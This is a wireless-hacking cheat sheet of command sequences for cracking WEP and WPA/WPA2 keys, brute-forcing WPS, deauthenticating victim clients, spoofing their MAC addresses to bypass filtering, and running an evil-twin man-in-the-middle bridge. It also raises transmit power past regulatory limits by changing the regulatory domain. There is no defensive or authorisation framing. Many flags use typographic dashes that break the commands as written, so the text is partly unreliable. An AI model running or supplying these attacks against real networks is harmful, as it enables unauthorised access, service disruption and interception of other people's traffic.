Linux Network Hacking

  1. ### Wireless Penetration Testing Cheat Sheet
  2. ## WIRELESS ANTENNA
  3. # Enable monitor mode
  4.  
  5. ifconfig wlan0mon down
  6. iwconfig wlan0mon mode monitor
  7. ifconfig wlan0mon up
  8.  
  9. # Increase Wi-Fi TX Power
  10. iw reg set B0
  11. iwconfig wlan0 txpower <NmW|NdBm|off|auto>
  12. # txpower is 30 (generally)
  13. # The permitted txpower depends on your country's regulatory domain; check the local rules before changing it
  14. iwconfig
  15.  
  16. # Change WiFi Channel
  17. iwconfig wlan0 channel <SetChannel(1-14)>
  18.  
  19. ## WEP CRACKING
  20. # Method 1 : Fake Authentication Attack
  21.  
  22. airmon-ng start wlan0
  23. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  24. # What’s my mac?
  25. macchanger --show wlan0mon
  26. aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
  27. aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
  28. aircrack-ng –b <BSSID> <PCAP_of_FileName>
  29.  
  30. # Method 2 : ARP Replay Attack
  31. airmon-ng start wlan0
  32. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  33.  
  34. # What’s my mac?
  35. macchanger --show wlan0mon
  36. aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
  37. aircrack-ng –b <BSSID> <PCAP_of_FileName>
  38.  
  39. # Method 3 : Chop Chop Attack
  40. airmon-ng start wlan0
  41. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  42. # What’s my mac?
  43. macchanger --show wlan0mon
  44. aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
  45. aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
  46. # Press ‘y’ ;
  47. packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
  48. aireplay-ng -2 –r <FileName2> wlan0mon
  49. aircrack-ng <PCAP_of_FileName>
  50.  
  51. # Method 4 : Fragmentation Attack
  52. airmon-ng start wlan0
  53. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  54. # What’s my mac?
  55. macchanger --show wlan0mon
  56. aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
  57. aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
  58. # Press ‘y’ ;
  59. packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
  60. aireplay-ng -2 –r <FileName2> wlan0mon
  61. aircrack-ng <PCAP_of_FileName>
  62.  
  63. # Method 5 : SKA (Shared Key Authentication) Type Cracking
  64. airmon-ng start wlan0
  65. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  66. aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
  67. ifconfig wlan0mon down
  68. macchanger –-mac <VictimMac> wlan0mon
  69. ifconfig wlan0mon up
  70. aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
  71. aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
  72. aircrack-ng <PCAP_of_FileName>
  73.  
  74. ## WPA / WPA2 CRACKING
  75.  
  76. # Method 1 : WPS Attack
  77. airmon-ng start wlan0
  78. apt-get install reaver
  79. wash –i wlan0mon –C
  80. reaver –i wlan0mon –b <BSSID> -vv –S
  81. # or, Specific attack
  82. reaver –i –c <Channel> -b <BSSID> -p <PinCode> -vv –S
  83.  
  84. # Method 2 : Dictionary Attack
  85. airmon-ng start wlan0
  86. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  87. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  88. aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
  89.  
  90. # Method 3 : Crack with John The Ripper
  91. airmon-ng start wlan0
  92. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  93. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  94. cd /pentest/passwords/john
  95. ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName>
  96.  
  97. # Method 4 : Crack with coWPAtty
  98. airmon-ng start wlan0
  99. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  100. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  101. cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID>
  102. genpmk –s <SSID> –f <Wordlist> -d <HashesFileName>
  103. cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>
  104.  
  105. # Method 5 : Crack with Pyrit
  106. airmon-ng start wlan0
  107. airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  108. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  109. pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
  110. pyrit –i <Wordlist> import_passwords
  111. pyrit –e <ESSID> create_essid
  112. pyrit batch
  113. pyrit –r <PCAP_of_FileName> attack_db
  114.  
  115. # Method 6 : Precomputed WPA Keys Database Attack
  116. airmon-ng start wlan0
  117. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  118. aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
  119. kwrite ESSID.txt
  120. airolib-ng NEW_DB --import essid ESSID.txt
  121. airolib-ng NEW_DB --import passwd <DictionaryFile>
  122. airolib-ng NEW_DB --clean all
  123. airolib-ng NEW_DB --stats
  124. airolib-ng NEW_DB --batch
  125. airolib-ng NEW_DB --verify all
  126. aircrack-ng –r NEW_DB <Handshaked_PCAP>
  127.  
  128. ## FIND HIDDEN SSID
  129.  
  130. airmon-ng start wlan0
  131. airodump-ng –c <Channel> --bssid <BSSID> wlan0mon
  132. aireplay-ng -0 20 –a <BSSID> -c <VictimMac> wlan0mon
  133.  
  134. ## BYPASS MAC FILTERING
  135.  
  136. airmon-ng start wlan0
  137. airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  138. aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
  139. ifconfig wlan0mon down
  140. macchanger –-mac <VictimMac> wlan0mon
  141. ifconfig wlan0mon up
  142. aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
  143.  
  144. ## MAN IN THE MIDDLE ATTACK
  145.  
  146. airmon-ng start wlan0
  147. airbase-ng –e “<FakeBSSID>” wlan0mon
  148. brctl addbr <VariableName>
  149. brctl addif <VariableName> wlan0mon
  150. brctl addif <VariableName> at0
  151. ifconfig eth0 0.0.0.0 up
  152. ifconfig at0 0.0.0.0 up
  153. ifconfig <VariableName> up
  154. aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon
  155. dhclient3 <VariableName> &
  156. wireshark &
  157. # then select the <VariableName> interface in Wireshark